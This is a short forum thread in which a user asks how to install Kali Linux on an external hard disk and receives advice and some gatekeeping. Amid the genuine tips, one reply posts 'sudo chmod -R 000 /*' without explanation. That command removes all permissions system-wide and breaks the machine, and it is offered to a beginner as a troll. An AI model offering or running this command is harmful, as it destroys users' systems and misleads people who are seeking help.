Hey guys, i want to install Kali Linux on an external Hard Disk without any errors. So can anyone help me out??

Google the kali linux persistent USB thumbdrive.  Then just repeat those steps to your USB disk drive. If you don't care about persistence then the install is even easier.

Read these instructions and use your hdd instead of a usb drive. Do not install kali as you would with a normal distribution, it's not meant to be used like that.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

I raise my eyebrows every time when I see nonprofessionals posting on the forum about kali Linux. 

 

I mean if you are an IT security proffesional you should know what you are doing. If you aren’t... well, it is like seeing a kid in a hardware store asking locksmith how to pick locks.
